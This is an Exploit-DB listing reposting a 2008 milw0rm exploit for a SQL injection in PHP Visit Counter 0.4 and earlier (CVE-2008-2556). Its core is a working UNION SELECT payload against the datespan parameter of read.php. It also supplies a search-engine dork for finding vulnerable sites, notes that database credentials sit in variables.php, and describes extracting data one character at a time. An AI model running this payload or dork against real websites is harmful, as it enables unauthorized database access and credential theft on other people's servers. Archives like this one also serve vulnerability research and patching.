PHP Visit Counter <= 0.4 datespan SQL Injection Vulnerability

2008-05-31T00:00:00
ID EDB-ID:5703
Type exploitdb
Reporter Lidloses_Auge
Modified 2008-05-31T00:00:00

Description

PHP Visit Counter <= 0.4 (datespan) SQL Injection Vulnerability. CVE-2008-2556. Webapps exploit for php platform

                                        
                                            ###############################################################
#
#           PHP Visit Counter &lt;= 0.4 - SQL Injection Vulnerability
#                                                             
#      Vulnerability discovered by: Lidloses_Auge             
#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco,
#                                   GPM, Free-Hack, Ciphercrew, h4ck-y0u
#      Date:                        30.05.2008
#
###############################################################
#                                                             
#      Dork:  inurl:"read.php?datespan="
#
#      Vulnerability:
#
#      1.) SQL Injection
#
#         1.1.) [Target]/read.php?action=read&cat=portal&datespan=null+group+by+null+union+select+1,2,ascii(substring(version(),1,1))/*
#
#      Notes:
#
#         Output is displayed as INT, so you've to convert it into ascii and
#         scan every single letter to get the whole name.
#         MySQL Data is stored in [Counterpath]/variables.php
#
###############################################################

# milw0rm.com [2008-05-31]